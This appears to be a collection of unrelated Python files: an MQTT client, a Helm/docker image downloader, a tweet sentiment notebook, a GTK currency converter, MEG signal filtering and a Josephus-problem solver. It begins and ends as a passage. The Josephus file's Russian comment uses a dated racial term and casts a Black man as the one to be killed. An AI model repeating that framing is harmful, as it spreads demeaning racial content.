    nr = 1
    for ic,evt in enumerate(evts):
        pos = evt.rpost_(irec)[:,:3] - origin
        # Tile the axis so costheta_ gets one axis vector per position row.
        axis_ = np.tile(axis, len(pos)).reshape(-1, len(axis))
        ct = costheta_(pos, axis_)
        th = np.arccos(ct)/deg
        ax = fig.add_subplot(nr,nc,1+ic)
        ax.hist(th, bins=nb)
        ax.set_xlabel("angle to axis %s " % str(axis))
if __name__ == '__main__':
    # Standalone check: load the default rainbow/torch event; exit with the
    # configured missing-resource code if the event files are absent.
    args = opticks_main(tag="5", det="rainbow", src="torch")
    try:
        evt = Evt(tag=args.tag, det=args.det, src=args.src, args=args)
    except IOError as err:
        log.fatal(err)
        sys.exit(args.mrc)
|
import os
import time
import logging
import paho.mqtt.client as mqtt
class mqttclient(object):
    # Thin wrapper around paho-mqtt: synchronous-looking connect / subscribe /
    # publish built on paho's async client by polling the _state dict that the
    # on_* callbacks update.
    def __init__(self,logger):
        _libName = str(__name__.rsplit('.', 1)[-1])
        self._log = logging.getLogger(logger + '.' + _libName + '.' + self.__class__.__name__)
        self._log.debug('Create MQTT mqttclient Object')
        self._host =''
        self._port = 1883
        self._subscribe = {}
        # Shared state flags written by the paho callbacks and polled by the
        # blocking helper methods below.
        self._state = {'CONNECTED': False,
                       'SUBSCRIBED': False,
                       'PUBLISHED': 0}
    # def __del__(self):
    # print('delte')
    # self._log.debug('Delete MQTT mqttclient Object')
    def construct(self):
        # Build the paho client and wire up all callbacks.
        # NOTE(review): the client id is the process PID, so two clients in one
        # process would collide; clean_session=False makes the id significant.
        self._log.debug('Methode: construct ()')
        self._mqttc = mqtt.Client(str(os.getpid()), clean_session=False)
        self._mqttc.reconnect_delay_set(min_delay=5, max_delay=60)
        self._mqttc.enable_logger(logging.getLogger('mqttClient'))
        self._mqttc.on_message = self.on_message
        self._mqttc.on_connect = self.on_connect
        self._mqttc.on_publish = self.on_publish
        self._mqttc.on_subscribe = self.on_subscribe
        self._mqttc.on_disconnect = self.on_disconnect
        return True
    def connect(self, host, port=1883, keepalive=60, bind_address=""):
        # Async connect + background network loop, then poll up to ~9s for the
        # CONNECTED flag set by on_connect. Returns True on success.
        self._log.debug('Methode: connect(%s, %d, %d)' % (host, port, keepalive))
        self._state['CONNECTED'] = False
        self._mqttc.connect_async(host, port, keepalive, bind_address)
        self._mqttc.loop_start()
        for _x in range(30):
            # print('1')
            if self._state.get('CONNECTED',False):
                # print('conn')
                self._log.debug('Connected to host %s', host)
                # self._mqttc.loop_start()
                return True
            else:
                time.sleep(0.3)
        return False
    def on_connect(self, client, userdata, flags, rc):
        # paho callback: record connection result in _state.
        self._log.debug('Methode: on_connect(%s, %s, %s , %s' % (client, userdata, flags, rc))
        if rc == mqtt.CONNACK_ACCEPTED:
            self._log.info('MQTT connected')
            self._state['CONNECTED'] = True
        else:
            self._log.error('MQTT failed to connect: {}'.format(rc))
            self._state['CONNECTED'] = False
        return True
    def disconnect(self):
        self._log.debug('Methode: disconnect()')
        # self._mqttc.wait_for_publish()
        self._state['CONNECTED'] = False
        self._mqttc.disconnect()
        return True
    def on_disconnect(self, client, userdata, rc):
        # paho callback: rc != 0 means the broker dropped us unexpectedly.
        self._log.debug('Methode: on_dissconnect(%s, %s, %s)' % (client, userdata, rc))
        if rc != 0:
            self._log.error('Unexpected disconnection.')
        return True
    def subscribe(self, topic):
        # Fire-and-check subscribe; True if paho queued the request.
        self._log.debug('Methode: subscribe(%s)', topic)
        (_result, _mid) = self._mqttc.subscribe(topic)
        if _result == mqtt.MQTT_ERR_SUCCESS:
            self._log.debug('Methode: subscribe() to topic %s with success' % topic)
        else:
            self._log.error('Methode: subscribe() failed to subscribe to topic %s' % topic)
            return False
        return True
    def on_subscribe(self, mqttc, obj, mid, granted_qos):
        self._log.debug('Methode: on_subscribe(%s, %s, %s, %s)' % (mqttc, obj, mid, granted_qos))
        return True
    def publish(self, topic, payload):
        # Publish and poll briefly for delivery confirmation (on_publish sets
        # _state['PUBLISHED'] to the message id).
        # NOTE(review): if the confirmation never arrives within ~0.9s this
        # method falls through and implicitly returns None, not False —
        # callers checking `is not False` treat that as success; confirm.
        self._log.debug('Methode: publish(%s, %s)' % (topic, payload))
        (_result, _mid) = self._mqttc.publish(topic, payload)
        if _result == mqtt.MQTT_ERR_SUCCESS:
            self._log.debug("Message {} queued successfully.".format(_mid))
            for _x in range(3):
                if self._state.get('PUBLISHED') == _mid:
                    self._log.debug('Message %d delivered', _mid)
                    return _mid
                else:
                    time.sleep(0.3)
        else:
            self._log.error("Failed to publish message. Error: {}".format(_result))
            return False
    def on_publish(self, client, userdata, mid):
        # paho callback: record last delivered message id.
        self._log.debug('Methode: on_publish(%s, %s, %s)' % (client, userdata, mid))
        self._state['PUBLISHED'] =mid
        return True
    def on_message(self, client, userdata, message):
        # Default message handler for topics without a dedicated callback.
        self._log.debug('Methode: on_message(%s, %s, %s)' % (client, userdata, message))
        # print("Received message '" + str(message.payload) + "' on topic '"
        # + message.topic + "' with QoS " + str(message.qos))
        self._log.debug('Received message Topic: {}'.format(message.topic))
        return message
    def callback(self, topic, callback):
        # Route messages for `topic` to a dedicated handler instead of on_message.
        self._log.debug('Methode: callback add topic to callback(%s, %s' % (topic, callback))
        self._mqttc.message_callback_add(topic, callback)
        # print('callbvac',x)
        # self._log.debug('Registerd Callback Topic: {}'.format(topic))
        return True
    def pushclient(self,config):
        # Publish-only client: construct + connect from a config dict.
        self._log.debug('Methode: pushclient(%s)',config)
        self._host = str(config.get('HOST','localhost'))
        self._port = int(config.get('PORT',1883))
        self.construct()
        return self.connect(self._host,self._port)
    def fullclient(self,config):
        # Full client: connect, then subscribe every entry of
        # config['SUBSCRIPTION'] and attach optional per-topic callbacks.
        # Returns a (success, message) tuple.
        self._log.debug('Methode: fullclient(%s)',config)
        self._host = str(config.get('HOST','localhost'))
        self._port = int(config.get('PORT',1883))
        self._subscribtion = config.get('SUBSCRIPTION',None)
        _result = False
        self.construct()
        if self.connect(self._host,self._port):
            if self._subscribtion is not None:
                # print('hier')
                for item in self._subscribtion:
                    # print(item)
                    _topic = item.get('SUBSCRIBE')
                    _callback = item.get('CALLBACK',None)
                    if self.subscribe(_topic):
                        if _callback is not None:
                            self.callback(_topic,_callback)
                    else:
                        return (False,'Subscription Failed')
        else:
            return (False,'Not Connected')
        return (True,'Connected')
class callmeback(object):
    # Demo per-topic message handlers used by the __main__ example below.
    def callback1(self, client, userdata, msg):
        print('callmeback1', client, userdata, msg)
        print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
    def callback2(self, client, userdata, msg):
        print('callmeback2', client, userdata, msg)
        print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
if __name__ == "__main__":
    # Demo: a publish-only client, then a full client with two subscriptions
    # and per-topic callbacks, publishing in a loop.
    logging.basicConfig(level=logging.DEBUG)
    logger = logging.getLogger('mqttclient')
    config1 = {'HOST': '192.168.20.205', 'CONFIG': '/TEST2/'}
    callme = callmeback()
    mqttpush = mqttclient('simpleExample')
    print(mqttpush.pushclient(config1))
    print(mqttpush.publish('/TEST/PUSH','1234567'))
    mqttpush.disconnect()
    time.sleep(10)
    mqttfull = mqttclient('fullExample')
    # Build the SUBSCRIPTION list: topic + handler pairs.
    z={}
    w={}
    y=[]
    z['SUBSCRIBE']='/TEST/FULL/2'
    z['CALLBACK']=callme.callback2
    w['SUBSCRIBE']='/TEST/FULL/1'
    w['CALLBACK']=callme.callback1
    y.append(z)
    y.append(w)
    config1['SUBSCRIPTION']=y
    print(config1)
    (state,message) = mqttfull.fullclient(config1)
    print(state,message)
    while True:
        time.sleep(5)
        # print(mqttfull.publish('/TEST/FULL/1', '12312412341235'))
        # NOTE(review): publish() can implicitly return None on a missed
        # confirmation, which `is not False` counts as success.
        if mqttfull.publish('/TEST/FULL/1','12312412341235') is not False:
            print('TRUE')
            # time.sleep(3)
        else:
            print('FALSE')
            # time.sleep(3)
|
#!/usr/bin/env python3
import os
import subprocess
import sys
import tempfile
import yaml
def pull_docker_image(image):
    """Pull *image* with the docker CLI and print the captured stdout.

    stderr is left attached to the terminal, matching the previous behavior.
    """
    # Idiom: subprocess.run replaces the manual Popen + communicate pair.
    result = subprocess.run(['docker', 'pull', image], stdout=subprocess.PIPE)
    print(result.stdout)
def download_container_images(manifest):
    # Render each HelmRelease in the manifest with `helm template`, walk the
    # produced Kubernetes specs, and docker-pull every referenced image.
    print("##### Download container images")
    with open(manifest) as f:
        releases = list(yaml.load_all(f, Loader=yaml.FullLoader))
    for release in releases:
        release['spec']['values']
        name = release['spec']['chart']['name']
        version = release['spec']['chart']['version']
        repository = release['spec']['chart']['repository']
        print("Chart Name: {}".format(name))
        # Write the release's values to a temp file for `helm template -f`.
        tmp = tempfile.NamedTemporaryFile(delete=False)
        try:
            tmp.write(yaml.dump(release['spec']['values']).encode())
            tmp.flush()
            print("helm template --repo {} --version {} -f {} {}".format(repository,version,tmp.name,name))
            rawhelmtemplate = subprocess.Popen(['helm', 'template', \
                                                '--repo', repository, \
                                                '--version', version, \
                                                '-f', tmp.name, \
                                                name], \
                                               stdout=subprocess.PIPE)
            (out,err) = rawhelmtemplate.communicate()
            helmyamls = yaml.load_all(out, Loader=yaml.SafeLoader)
            for helmyaml in helmyamls:
                if helmyaml is not None and 'spec' in helmyaml:
                    print(helmyaml)
                    spec = helmyaml['spec']
                    # Pod-template resources (Deployments etc.): descend into
                    # spec.template.spec before looking for containers.
                    if 'template' in spec:
                        template = spec['template']
                        if 'spec' in template:
                            spec = template['spec']
                            if 'containers' in spec:
                                for container in spec['containers']:
                                    print("Case 1 - container: {}".format(container['image']))
                                    pull_docker_image(container['image'])
                    # NOTE(review): for template specs, Case 3 re-pulls the
                    # same containers Case 1 already handled (spec was
                    # reassigned above) — harmless but redundant; confirm.
                    if 'initContainers' in spec:
                        for initcontainer in spec['initContainers']:
                            print("Case 2 - Init container: {}".format(initcontainer['image']))
                            pull_docker_image(initcontainer['image'])
                    if 'containers' in spec:
                        for container in spec['containers']:
                            print("Case 3 - spec container: {}".format(container['image']))
                            pull_docker_image(container['image'])
                    if 'image' in spec:
                        print("Case 4 - spec image: {}".format(spec['image']))
                        pull_docker_image(spec['image'])
        finally:
            os.unlink(tmp.name)
            tmp.close()
def main():
    """CLI entry: validate the single manifest argument and run the download."""
    if len(sys.argv) != 2:
        print("Error: This file needs manifest argument.")
        print("Usage: download_container_images.py <MANIFEST YAML>")
        # FIX: use sys.exit — the `exit` builtin comes from the `site` module
        # and is not guaranteed in all interpreter invocations.
        sys.exit(1)
    manifest = sys.argv[1]
    download_container_images(manifest)

if __name__ == "__main__":
    main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# На судне находится 20 человек, между ними один негр. Вследствие недостатка в
# продовольствии один из команды должен быть выброшен за борт. Решено
# отсчитывать по семи и каждого седьмого освобождать; дойдя до конца ряда,
# переходить к его началу, не прерывая счёта. Оставшийся последним должен
# умереть. Негр (обозначенный перевернутой спичкой) может стать на любое место
# в ряду. С кого следует начинать счёт, чтобы негр оставался всегда последним?
def pos_of_killed(total, start, step, visualisate=False):
    """Simulate the counting-out game: `total` people in a ring, counting
    begins at `start`, every `step`-th person is removed; return the position
    (in the original numbering) of the last person remaining.
    """
    # FIX: ported from Python-2-only syntax (`print x`, `del` on a range
    # object) to a form valid on both Python 2 and 3.
    pool = list(range(total))
    if visualisate:
        print(pool)
    pos = start
    while len(pool) > 1:
        pos = (pos + step - 1) % len(pool)
        del pool[pos]
        if visualisate:
            print(pool)
    return pool[0]
def should_start_from(total, start, step, pos_of_black):
    """Return the start position that makes the person at `pos_of_black`
    the survivor, and print a visual run of the game from that start.
    """
    # FIX: ported print statements to the function form (valid on Py2 and Py3).
    # The survivor position shifts linearly with the start, so shift the start
    # by the difference between the desired and the baseline survivor.
    offset = pos_of_killed(total, start, step)
    good_start = (pos_of_black - offset) % total
    print("Black is at position %d" % pos_of_black)
    print("We should start from %d" % good_start)
    pos_of_killed(total, good_start, step, True)
    return good_start
# Sanity check from the original puzzle statement (20 people, count by 7).
assert should_start_from(20, 0, 7, 7) == 5
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib.pylab import rcParams
rcParams['figure.figsize'] =15,9
import findspark
# In[2]:
# Load every streamed-tweet CSV into one DataFrame.
# NOTE(review): error_bad_lines is deprecated/removed in modern pandas —
# use on_bad_lines='skip' when upgrading.
import glob,csv
import pandas as pd
df = pd.concat([pd.read_csv(f, encoding='latin1', quoting=csv.QUOTE_NONE,error_bad_lines=False) for f in glob.glob(r'C:\Users\Lalith Chandra A\BDP_Project\temp_csv\*.csv')])
# In[3]:
# Mirror the pandas frame into Spark and expose it as a temp SQL view.
from pyspark.sql import SparkSession, column
spark = SparkSession.builder.appName("Hive TST").enableHiveSupport().getOrCreate()
# In[4]:
spark
# In[5]:
spark_df=spark.createDataFrame(df)
# In[6]:
spark_df.show()
# In[7]:
spark_df.createOrReplaceTempView("streamed_tweets")
# In[ ]:
# In[10]:
# Spark streaming / SQL context setup for the notebook.
import findspark
findspark.init('C:\spark-2.4.5-bin-hadoop2.7')
# May cause deprecation warnings, safe to ignore, they aren't errors
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from pyspark.sql import SQLContext
from pyspark.sql.functions import desc
from pyspark.sql import Row
import re
# Can only run this once. restart your kernel for any errors.
sc = SparkContext.getOrCreate()
# sc1 = SparkSession.builder.appName("Hive TST").enableHiveSupport().getOrCreate()
ssc = StreamingContext(sc, 10 )
sqlContext = SQLContext(sc)
# BUG FIX: the lines below were Scala copy-pasted from a spark-shell session
# (`val ... = new ...` is a Python SyntaxError, and `org` is not a Python
# module); kept as comments for reference only.
# import org.apache.spark.sql.hive.HiveContext
# In[9]:
# import org.apache.spark.sql.hive.HiveContext
# val hiveContext = new org.apache.spark.sql.hive.HiveContext(sc)
# In[7]:
df.head(20)
# In[8]:
# Percentage of tweets containing no ASCII letters at all.
((df[~(df['_1'].str.contains('[A-Za-z]'))].count()[0])/df.count()[0])*100
# In[9]:
df.rename(columns={'_1':'tweet_txt'},inplace=True)
# In[10]:
df.head()
# In[11]:
df.dtypes
# In[12]:
import re
def data_cleansing(corpus):
    """Strip every non-alphabetic character from *corpus* and return the
    remaining words lowercased and single-space separated."""
    alpha_only = re.sub("[^a-zA-Z]", " ", corpus)
    tokens = alpha_only.lower().split()
    return " ".join(tokens)
df['tweet_txt'] = df['tweet_txt'].apply(lambda x:data_cleansing(x))
# In[13]:
df.head()
# In[14]:
# TextBlob polarity in [-1, 1] per tweet.
from textblob import TextBlob
df['sentiment_value']=df.tweet_txt.apply(lambda x:TextBlob(str((x).encode('ascii', 'ignore'))).sentiment.polarity)
# In[15]:
TextBlob(str(('bad people').encode('ascii', 'ignore'))).sentiment.polarity
# In[16]:
# Label: polarity <= 0 is treated as negative (score 1 / 'negative').
df['sentiment_score']=np.where(df.sentiment_value<=0.0,1,0)
# In[17]:
df['sentiment_description']=np.where(df.sentiment_value<=0.0,'negative','positive')
# In[18]:
df.head(30)
# In[19]:
print(df.sentiment_score.value_counts(),'\n\n',df.sentiment_description.value_counts())
# In[20]:
from wordcloud import WordCloud, STOPWORDS
stopwords = set(STOPWORDS)
def wordcloud(source,stop):
    # Plot a word cloud of all tweets labeled `source` ('positive'/'negative');
    # stop=="yes" applies the module-level `stopwords` set.
    # Reads module globals: df, stopwords, plt.
    # NOTE(review): the local variable below shadows this function's own name
    # and the imported WordCloud module-style name — rename when refactoring.
    tmp = df[df['sentiment_description']==source]
    clean_text=[]
    for each in tmp['tweet_txt']:
        clean_text.append(each)
    clean_text = ' '.join(clean_text)
    # White background for positive clouds, black for negative.
    if source == 'positive' :
        color='white'
    else:
        color='black'
    if (stop=="yes"):
        wordcloud = WordCloud(background_color=color,
                              width=3500,
                              height=3000,stopwords = stopwords
                              ).generate(clean_text)
    else:
        wordcloud = WordCloud(background_color=color,
                              width=3500,
                              height=3000
                              ).generate(clean_text)
    print('==='*30)
    print('word cloud of '+source+' is plotted below')
    plt.figure(1,figsize=(8,8))
    plt.imshow(wordcloud,interpolation='bilinear')
    plt.axis('off')
    plt.show()
# In[21]:
# Domain-specific stopwords for the clouds.
stopwords.add('co')
stopwords.add('https')
stopwords.add('hey')
stopwords.add('hello')
stopwords.add('school')
# In[22]:
wordcloud('positive',"yes")
# In[23]:
wordcloud('negative',"yes")
# In[24]:
# 70/30 train/test split of the labeled tweets.
from sklearn.model_selection import train_test_split
train, test = train_test_split(df,test_size=0.3)
# In[25]:
df.head()
# In[26]:
# Raw text corpora for vectorization.
train_corpus = []
test_corpus = []
model_corpus=[]
for each in train['tweet_txt']:
    train_corpus.append(each)
for each in test['tweet_txt']:
    test_corpus.append(each)
for each in df['tweet_txt']:
    model_corpus.append(each)
## Start creating them
# TF-IDF features; vocabulary fit on the training corpus only.
from sklearn.feature_extraction.text import TfidfVectorizer
v = TfidfVectorizer(stop_words='english',strip_accents='unicode',
                    token_pattern=r'\w{2,}')
train_features = v.fit_transform(train_corpus)
test_features=v.transform(test_corpus)
model_features = v.transform(model_corpus)
# In[27]:
print(train_features.shape)
print(test_features.shape)
print(model_features.shape)
# In[28]:
v.get_feature_names()
# In[29]:
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
# In[30]:
# Candidate classifiers keyed by short name for ML_Pipeline().
Classifiers = {'lg':LogisticRegression(random_state=42,C=5,max_iter=200), 'dt':DecisionTreeClassifier(random_state=42,min_samples_leaf=1), 'rf':RandomForestClassifier(random_state=42,n_estimators=100,n_jobs=-1), 'gb':GradientBoostingClassifier(random_state=42,n_estimators=100,learning_rate=0.3)}
# In[31]:
def ML_Pipeline(clf_name):
    """Fit the named classifier on the TF-IDF training features and print
    its held-out accuracy and confusion matrix.

    Parameters
    ----------
    clf_name : str
        Key into the module-level ``Classifiers`` dict ('lg', 'dt', 'rf', 'gb').

    Returns
    -------
    The fitted classifier. (The original returned None, so the later cell
    ``model = ML_Pipeline('lg')`` bound None instead of a model.)
    """
    clf = Classifiers[clf_name]
    clf.fit(train_features, train['sentiment_description'])
    pred = clf.predict(test_features)
    Accuracy = accuracy_score(test['sentiment_description'], pred)
    Confusion_matrix = confusion_matrix(test['sentiment_description'], pred)
    print('==='*35)
    print('Accuracy of '+ clf_name +' is '+str(Accuracy))
    print('==='*35)
    print(Confusion_matrix)
    return clf
# In[32]:
ML_Pipeline('lg')
# In[33]:
# NOTE(review): both np.where branches are zero (0 and 0.0), so this
# column is constant — presumably a TextBlob polarity score was intended;
# confirm against the original notebook.
df['textblob_score']=np.where(df.sentiment_value<=1,0,0.0)
# In[34]:
df.head()
# In[35]:
# NOTE(review): with textblob_score constant at 0, the condition <=0.0 is
# always true, so every row is labelled 'positive' — verify intent.
df['tbsentiment_description']=np.where(df.textblob_score<=0.0,'positive','negative')
# In[36]:
df.head()
# In[37]:
# Agreement between the (degenerate) TextBlob labels and the originals.
accuracy_score( df['tbsentiment_description'], df['sentiment_description'],)
# In[38]:
# NOTE(review): ML_Pipeline has no return statement, so `model` is None
# and the new column is filled with None — confirm this is not intended
# to hold per-row predictions.
model = ML_Pipeline('lg')
df["model_description"]=model
# In[39]:
ML_Pipeline('dt')
# In[40]:
test_corpus
# In[41]:
train['sentiment_description']
# In[42]:
# Fit a random forest to inspect feature importances.
clf = RandomForestClassifier(random_state=42,n_estimators=100,n_jobs=-1)
# `fit` is the same estimator object as `clf` (sklearn's fit returns self).
fit = clf.fit(train_features,train['sentiment_description'])
# In[43]:
# NOTE(review): get_feature_names() was removed in scikit-learn 1.2;
# newer versions need get_feature_names_out().
words = v.get_feature_names()
importance = clf.feature_importances_
# Rank vocabulary terms by importance (descending), ties broken by word.
impordf = pd.DataFrame({'Word' : words,'Importance' : importance})
impordf = impordf.sort_values(['Importance', 'Word'], ascending=[0, 1])
impordf.head(20)
# In[44]:
# Terms the forest never used.
impordf.loc[impordf['Importance']<=0.0]
# In[45]:
# Refit logistic regression standalone (same settings as Classifiers['lg'])
# and report held-out metrics; this fitted `fit`/`clf` is what gets dumped
# to 'lr.joblib' in the next cell.
clf = LogisticRegression(random_state=42,C=5,max_iter=200)
fit = clf.fit(train_features,train['sentiment_description'])
pred = clf.predict(test_features)
Accuracy = accuracy_score(test['sentiment_description'],pred)
Confusion_matrix = confusion_matrix(test['sentiment_description'],pred)
print('==='*35)
print('Accuracy of '+ 'lr' +' is '+str(Accuracy))
print('==='*35)
print(Confusion_matrix)
# In[46]:
get_ipython().system('pip install joblib')
# In[47]:
# Persist the fitted logistic regression and the TF-IDF vectorizer so
# inference can run without retraining.
from joblib import dump,load
dump(fit,'lr.joblib')
dump(v,'tfid.joblib')
# In[48]:
# Reload them to simulate a fresh inference session.
from joblib import dump,load
model=load('lr.joblib')
tfidf_temp=load('tfid.joblib')
# In[49]:
# Sample messages to classify.
a=["internet is very slow",
"issue with billing",
"nice service provided",
"thanks problem resolved"
,"HeyFriends I found great iPhone 6S giveaway you can get it here---> #iphone6Sgiveawy2k16 Check it out looks like great freebie. Don't Drop This"
,"Unfortunately I will have to transfer my lines to a different provider. I would like to ensure there won't be any issues when my new provider attempts to port my numbers to their service?"]
# Clean, vectorize with the saved TF-IDF model, and predict sentiment.
# NOTE(review): data_cleansing is defined earlier in the notebook (outside
# this excerpt) — confirm it matches the cleaning used at training time.
tdf=pd.Series(a).astype(str).apply(lambda x:data_cleansing(x))
t_a=tfidf_temp.transform(tdf)
pred1 = model.predict(t_a)
# In[50]:
pred1
# In[49]:
# Fix: the original line was `ML_Pipeline(tfid.joblib)`, which raises
# NameError — `tfid` is not a Python name ('tfid.joblib' is the *file*
# the vectorizer was saved under). ML_Pipeline expects a key from the
# `Classifiers` dict, so rerun the logistic-regression pipeline.
ML_Pipeline('lg')
# In[ ]:
|
import libglade, gtk
from funciones import conversiones
class EuroConversor:
    """GTK/Glade peseta<->euro converter window (Python 2 / pygtk)."""
    def __init__(self):
        # Load the window and grab both text entries from the Glade file.
        self.arbol = libglade.GladeXML( "uno.glade", "window1" )
        self.caja1 = self.arbol.get_widget( "entry1" )
        self.caja2 = self.arbol.get_widget( "entry2" )
        # Both entries funnel key presses into the same handler, `pasar`.
        manejadores = { "on_entry1_key_press_event" : self.pasar,
                        "on_entry2_key_press_event" : self.pasar,
#                        "on_entry1_changed" : self.pasar,
#                        "on_entry2_changed" : self.pasar,
                      }
        self.arbol.signal_autoconnect( manejadores )
        self.arbol.signal_connect( "on_window1_destroy", self.salir )
    def a_correr(self):
        """Enter the GTK main loop."""
        gtk.mainloop()
    def salir(self, obj):
        """Quit the GTK main loop when the window is destroyed."""
        print "Saliendo..."
        gtk.mainquit()
    def pasar(self, obj, ev):
        """Key-press handler shared by both entries.

        'obj' is the widget that fired the event (the text entry); 'ev'
        is the key event, dir(ev) = keyval, send_event, state, string,
        time, type, window. Validates the would-be text (current text
        plus the typed character) and mirrors the converted amount into
        the other entry, clearing both entries on invalid input.
        """
        nombre = libglade.get_widget_name( obj )
        if nombre == "entry1":
            # entry1 holds pesetas; convert into euros in entry2.
            entrada_validada1 = conversiones.validar_entrada1(obj.get_text() + ev.string)
            if entrada_validada1:
                self.caja2.set_text( conversiones.pelas_a_euros( entrada_validada1 ) )
            else:
                self.caja1.set_text( "" )
                self.caja2.set_text( "" )
        elif nombre == "entry2":
            # entry2 holds euros; convert into pesetas in entry1.
            entrada_validada2 = conversiones.validar_entrada2(obj.get_text() + ev.string)
            if entrada_validada2:
                self.caja1.set_text( conversiones.euros_a_pelas( entrada_validada2 ) )
            else:
                self.caja1.set_text( "" )
                self.caja2.set_text( "" )
|
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 26 15:03:48 2013
@author: bejar
"""
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 8 12:41:42 2013
@author: bejar
"""
import scipy.io
from numpy import mean, std
import matplotlib.pyplot as plt
from pylab import *
from numpy.fft import rfft, irfft
from matplotlib.backends.backend_pdf import PdfPages
# MEG sensor labels grouped by scalp region.
regions={'sup':['A2','A3','A4','A5','A6','A7','A8','A9',
                'A10','A11','A12','A13','A14','A15','A16',
                'A17','A18','A19','A20','A21','A22','A23',
                'A24','A25','A26','A27','A28','A29'],
         'front': ['A30','A31','A32',
                   'A48','A49','A50','A51','A52',
                   'A69','A70','A71','A72','A73','A74',
                   'A92','A93','A94'],
         'tempi': ['A33','A34','A35','A36','A37',
                   'A53','A54','A55','A56','A57',
                   'A75','A76','A77','A78','A79','A80',
                   'A95','A96','A97','A98','A99','A100',
                   'A113','A114','A115','A116','A117','A118',
                   'A131','A132','A133','A134','A135','A136'],
         'tempd': ['A43','A44','A45','A46','A47',
                   'A64','A65','A66','A67','A68',
                   'A86','A87','A88','A89','A90','A91',
                   'A107','A108','A109','A110','A111','A112',
                   'A125','A126','A127','A128','A129','A130',
                   'A143','A144','A145','A146','A147','A148'],
         'occip': ['A38','A39','A40','A41','A42',
                   # Fix: a missing comma after 'A63' made Python
                   # implicitly concatenate 'A63' 'A81' into the bogus
                   # label 'A63A81', silently dropping both channels.
                   'A58','A59','A60','A61','A62','A63',
                   'A81','A82','A83','A84','A85',
                   'A101','A102','A103','A104','A105','A106',
                   'A119','A120','A121','A122','A123','A124',
                   'A137','A138','A139','A140','A141','A142']
         }
def plotSignals(signals,cpath,n,m):
    """Plot each (signal, name) pair of ``signals`` on one n-by-m subplot
    grid and append the page to the PDF.

    NOTE(review): writes to a global ``pp`` (a PdfPages object, judging by
    the PdfPages import) that is not defined in this file's visible code —
    it must be opened before calling; confirm. The ``cpath`` parameter is
    unused here.
    """
    fig = plt.figure()
    fig.set_figwidth(16)
    fig.set_figheight(30)
    i=1
    for s,snm in signals:
        # Flat signals (min == max) cannot be auto-scaled; draw a
        # placeholder instead.
        if min(s)!=max(s):
            plotSignalValues(fig,s,n,m,i,snm)
        else:
            plotDummy(fig,len(s),n,m,i,snm)
        i+=1
    fig.savefig(pp, orientation='landscape',format='pdf')
#    plt.show()
# Plot a set of signals
#def plotSignalValues(fig,signal1,n,m,p,name):
# minaxis=min(signal1)
# maxaxis=max(signal1)
# num=len(signal1)
# sp1=fig.add_subplot(n,m,p)
# plt.title(name)
# sp1.axis([0,num,minaxis,maxaxis])
# t = arange(0.0, num, 1)
# sp1.plot(t,signal1)
# plt.show()
def plotDummy(fig, num, n, m, p, name):
    """Draw a placeholder y=x line (titled *name*) in cell *p* of an
    n-by-m subplot grid, used for signals with no dynamic range."""
    axes = fig.add_subplot(n, m, p)
    plt.title(name)
    # Fixed [-1, 1] vertical range since there is no real signal to scale to.
    axes.axis([0, num, -1, 1])
    samples = arange(0.0, num, 1)
    axes.plot(samples, samples)
# Plot a set of signals
#def plotSignalValues(signal):
# fig = plt.figure()
# minaxis=min(signal)
# maxaxis=max(signal)
# sp1=fig.add_subplot(111)
# sp1.axis([0,length,minaxis,maxaxis])
# t = arange(0.0, length, 1)
# sp1.plot(t,signal)
# plt.show()
def plotSignalValues(signal1, signal2, signal3):
    """Plot three signals stacked vertically (subplots 311/312/313) in a
    fresh figure and show it.

    Fix: the original reused ``len(signal1)`` as the x-axis extent for
    signal2 and signal3 as well, clipping or padding their plots whenever
    the signals differ in length; each subplot is now scaled to its own
    signal's length and min/max.
    """
    fig = plt.figure()
    for position, signal in zip((311, 312, 313), (signal1, signal2, signal3)):
        sp = fig.add_subplot(position)
        num = len(signal)
        sp.axis([0, num, min(signal), max(signal)])
        t = arange(0.0, num, 1)
        sp.plot(t, signal)
    plt.show()
def signalIndex(sig):
    """Return the row index of channel name ``sig`` in the global
    ``chann`` array loaded from the .mat file.

    NOTE(review): scans every row and keeps the LAST match, and returns 0
    (the first channel) when the name is absent — assumes channel names
    are unique; confirm.
    """
    ind=0
    for i in range(chann.shape[0]):
        if chann[i][0][0]==sig:
            ind=i
    return ind
# --- Script body (Python 2: note the bare `print` below) ---
cpath='/home/bejar/MEG/Data/compensados/'
cres='/home/bejar/Documentos/Investigacion/MEG/res/'
#name='MMN-201205251030'
name='comp1-MEG'
# Load the MEG recording and pick the signal for channel A120.
mats=scipy.io.loadmat( cpath+name+'.mat')
chann=mats['names']
data= mats['data'][signalIndex('A120')]
# Frequency-band parameters (unused below — kept for reference).
freqi1=0
freqf1=6
freqi2=8
freqf2=18
length=2048#678*2
# 30-60 = 181-363 (2048)
# 60-100=363-606
# FFT bin ranges to zero out (band-pass: keep only bins 363..606).
zeroed=[(0,363),(606,1024)]
off=8000
print signalIndex('A120')
# Heartbeat-artifact parameters (the removal loop is commented out).
ibeat=280
ilength=40
ifreq=525
hbeat=data[off:length+off].copy()
#for i in range(ibeat,len(hbeat),ifreq):
#    hbeat[i:i+ilength]=hbeat[i]
#    print i
orig=hbeat
# Filter in the frequency domain: forward real FFT, zero the selected
# bins, inverse FFT back to the time domain.
temp= rfft(orig)
for i,f in zeroed:
    temp[i:f]=0
vals= irfft(temp)
# Compare filtered vs. raw vs. original slice.
plotSignalValues(vals,hbeat,data[off:length+off])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from head import *
from django_frame_solution import DjangoFrameSolution
class DjangoFrameMain():
    """
    Handles one connection instance: receiving/sending packets and
    parsing their contents.
    """
    def __init__(self, client):
        # The connected socket and its file descriptor number.
        self.client = client
        self.fileno = client.fileno()
    def main_receivor(self, ):
        """
        Main entry point for a connection instance: receive data.

        Returns the parsed JSON instance when the received body is
        non-empty, otherwise None (implicit).
        NOTE(review): the original docstring claimed 1/-1/0 return codes
